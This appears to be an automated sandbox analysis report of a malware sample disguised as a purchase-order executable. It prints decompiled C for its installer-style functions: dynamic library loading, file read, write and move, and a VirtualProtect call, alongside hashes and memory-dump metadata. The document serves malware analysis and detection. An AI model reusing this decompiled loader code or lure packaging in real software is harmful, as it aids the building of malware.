                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableShow
                                                                      • String ID:
                                                                      • API String ID: 1136574915-0
                                                                      • Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                      • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                                      • Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                      • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040678A(signed int _a4) {
                                                                      				struct HINSTANCE__* _t5;
                                                                      				signed int _t10;
                                                                      
                                                                      				_t10 = _a4 << 3;
                                                                      				_t8 =  *(_t10 + 0x40a410);
                                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                      				if(_t5 != 0) {
                                                                      					L2:
                                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                      				}
                                                                      				_t5 = E0040671A(_t8); // executed
                                                                      				if(_t5 == 0) {
                                                                      					return 0;
                                                                      				}
                                                                      				goto L2;
                                                                      			}





                                                                      0x00406792
                                                                      0x00406795
                                                                      0x0040679c
                                                                      0x004067a4
                                                                      0x004067b0
                                                                      0x00000000
                                                                      0x004067b7
                                                                      0x004067a7
                                                                      0x004067ae
                                                                      0x00000000
                                                                      0x004067bf
                                                                      0x00000000

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                        • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                        • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                        • Part of subcall function 0040671A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                      • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                      • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                      • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E00405EA2(WCHAR* _a4, long _a8, long _a12) {
                                                                      				signed int _t5;
                                                                      				void* _t6;
                                                                      
                                                                      				_t5 = GetFileAttributesW(_a4); // executed
                                                                      				asm("sbb ecx, ecx");
                                                                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                      				return _t6;
                                                                      			}





                                                                      0x00405ea6
                                                                      0x00405eb3
                                                                      0x00405ec8
                                                                      0x00405ece

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PO No. 3200005919.exe,80000000,00000003), ref: 00405EA6
                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405E7D(WCHAR* _a4) {
                                                                      				signed char _t3;
                                                                      				signed char _t7;
                                                                      
                                                                      				_t3 = GetFileAttributesW(_a4); // executed
                                                                      				_t7 = _t3;
                                                                      				if(_t7 != 0xffffffff) {
                                                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                      				}
                                                                      				return _t7;
                                                                      			}





                                                                      0x00405e82
                                                                      0x00405e88
                                                                      0x00405e8d
                                                                      0x00405e96
                                                                      0x00405e96
                                                                      0x00405e9f

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E96
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                      • Instruction ID: b4a9c655c7fc096b4b126609cc6ca019b0e5db690544b5b17486f729e9fe50d2
                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                      • Instruction Fuzzy Hash: F4D0C972504420ABC2502728EF0889BBB95DB542727124B35FAE9A22B0CB304C568A98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405960(WCHAR* _a4) {
                                                                      				int _t2;
                                                                      
                                                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                      				if(_t2 == 0) {
                                                                      					return GetLastError();
                                                                      				}
                                                                      				return 0;
                                                                      			}




                                                                      0x00405966
                                                                      0x0040596e
                                                                      0x00000000
                                                                      0x00405974
                                                                      0x00000000

                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                      • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                      • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(?), ref: 0413FF60
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: f2f9871392ae69307b0461bb10e856757a96cc1fae3dc0183b291c370769efe2
                                                                      • Instruction ID: 57f99e7c4e37664dbf948aae779c2d71cc69b345048537f34a32cfcbf4d21981
                                                                      • Opcode Fuzzy Hash: f2f9871392ae69307b0461bb10e856757a96cc1fae3dc0183b291c370769efe2
                                                                      • Instruction Fuzzy Hash: 37212B71A042849FCB38DD25CCA47DF76A7AF98340F95412F9C4A97240D6309B85CB06
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E0040167B() {
                                                                      				int _t7;
                                                                      				void* _t13;
                                                                      				void* _t15;
                                                                      				void* _t20;
                                                                      
                                                                      				_t18 = E00402C37(0xffffffd0);
                                                                      				_t16 = E00402C37(0xffffffdf);
                                                                      				E00402C37(0x13);
                                                                      				_t7 = MoveFileW(_t4, _t5); // executed
                                                                      				if(_t7 == 0) {
                                                                      					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E004066F3(_t18) == 0) {
                                                                      						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                      					} else {
                                                                      						E00406176(_t15, _t18, _t16);
                                                                      						_push(0xffffffe4);
                                                                      						goto L5;
                                                                      					}
                                                                      				} else {
                                                                      					_push(0xffffffe3);
                                                                      					L5:
                                                                      					E00401423();
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t20 - 4));
                                                                      				return 0;
                                                                      			}







                                                                      0x00401684
                                                                      0x0040168d
                                                                      0x0040168f
                                                                      0x00401696
                                                                      0x0040169e
                                                                      0x004016aa
                                                                      0x00402885
                                                                      0x004016be
                                                                      0x004016c0
                                                                      0x004016c5
                                                                      0x00000000
                                                                      0x004016c5
                                                                      0x004016a0
                                                                      0x004016a0
                                                                      0x00402245
                                                                      0x00402245
                                                                      0x00402245
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FileMove
                                                                      • String ID:
                                                                      • API String ID: 3562171763-0
                                                                      • Opcode ID: c1d43baabd1eef5e34ad60f445f20627e6d120529983dc64c83c49ec714ab695
                                                                      • Instruction ID: cad2bc101cc9b1bd25101b07fb13f8df210b8e2a6e84e2c3711288d22c68260e
                                                                      • Opcode Fuzzy Hash: c1d43baabd1eef5e34ad60f445f20627e6d120529983dc64c83c49ec714ab695
                                                                      • Instruction Fuzzy Hash: FFF0E93160811497DB20BBB54F0DE5F61649F963A8F24073FF051F22E1DABD891295AF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 33%
                                                                      			E004027E9(intOrPtr __edx, void* __eflags) {
                                                                      				long _t8;
                                                                      				long _t10;
                                                                      				LONG* _t12;
                                                                      				void* _t14;
                                                                      				intOrPtr _t15;
                                                                      				void* _t17;
                                                                      				void* _t19;
                                                                      
                                                                      				_t15 = __edx;
                                                                      				_push(ds);
                                                                      				if(__eflags != 0) {
                                                                      					_t8 = E00402C15(2);
                                                                      					_pop(_t14);
                                                                      					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
                                                                      					_t10 = SetFilePointer(E00406310(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                                                      					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                                                      						_push(_t10);
                                                                      						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                      						E004062F7();
                                                                      					}
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
                                                                      				return 0;
                                                                      			}










                                                                      0x004027e9
                                                                      0x004027e9
                                                                      0x004027ea
                                                                      0x004027f2
                                                                      0x004027f7
                                                                      0x004027f8
                                                                      0x00402807
                                                                      0x00402810
                                                                      0x00402a61
                                                                      0x00402a62
                                                                      0x00402a65
                                                                      0x00402a65
                                                                      0x00402810
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                        • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                      • Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
                                                                      • Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                                      • Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405F54(void* _a4, void* _a8, long _a12) {
                                                                      				int _t7;
                                                                      				long _t11;
                                                                      
                                                                      				_t11 = _a12;
                                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                      					return 0;
                                                                      				} else {
                                                                      					return 1;
                                                                      				}
                                                                      			}





                                                                      0x00405f58
                                                                      0x00405f68
                                                                      0x00405f70
                                                                      0x00000000
                                                                      0x00405f77
                                                                      0x00000000
                                                                      0x00405f79

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00412828,0040CED0,004033C2,0040CED0,00412828,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                      • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                      • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405F25(void* _a4, void* _a8, long _a12) {
                                                                      				int _t7;
                                                                      				long _t11;
                                                                      
                                                                      				_t11 = _a12;
                                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                      					return 0;
                                                                      				} else {
                                                                      					return 1;
                                                                      				}
                                                                      			}





                                                                      0x00405f29
                                                                      0x00405f39
                                                                      0x00405f41
                                                                      0x00000000
                                                                      0x00405f48
                                                                      0x00000000
                                                                      0x00405f4a

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                      • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                      • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                      
                                                                      				 *0x10004048 = _a4;
                                                                      				if(_a8 == 1) {
                                                                      					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                                                      					 *0x1000405c = 0xc2;
                                                                      					 *0x1000404c = 0;
                                                                      					 *0x10004054 = 0;
                                                                      					 *0x10004068 = 0;
                                                                      					 *0x10004058 = 0;
                                                                      					 *0x10004050 = 0;
                                                                      					 *0x10004060 = 0;
                                                                      					 *0x1000405e = 0;
                                                                      				}
                                                                      				return 1;
                                                                      			}



                                                                      0x100027cb
                                                                      0x100027d0
                                                                      0x100027e0
                                                                      0x100027e8
                                                                      0x100027ef
                                                                      0x100027f4
                                                                      0x100027f9
                                                                      0x100027fe
                                                                      0x10002803
                                                                      0x10002808
                                                                      0x1000280d
                                                                      0x1000280d
                                                                      0x10002815

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                      • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                      • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00402348(short __ebx) {
                                                                      				short _t7;
                                                                      				WCHAR* _t8;
                                                                      				WCHAR* _t19;
                                                                      				void* _t21;
                                                                      				void* _t24;
                                                                      
                                                                      				_t7 =  *0x40a010; // 0xa
                                                                      				 *(_t21 + 8) = _t7;
                                                                      				_t8 = E00402C37(1);
                                                                      				 *(_t21 - 0x4c) = E00402C37(0x12);
                                                                      				GetPrivateProfileStringW(_t8,  *(_t21 - 0x4c), _t21 + 8, _t19, 0x3ff, E00402C37(0xffffffdd)); // executed
                                                                      				_t24 =  *_t19 - 0xa;
                                                                      				if(_t24 == 0) {
                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                      					 *_t19 = __ebx;
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                      				return 0;
                                                                      			}








                                                                      0x00402348
                                                                      0x0040234f
                                                                      0x00402352
                                                                      0x00402362
                                                                      0x00402379
                                                                      0x0040237f
                                                                      0x00401751
                                                                      0x00402853
                                                                      0x0040285a
                                                                      0x0040285a
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
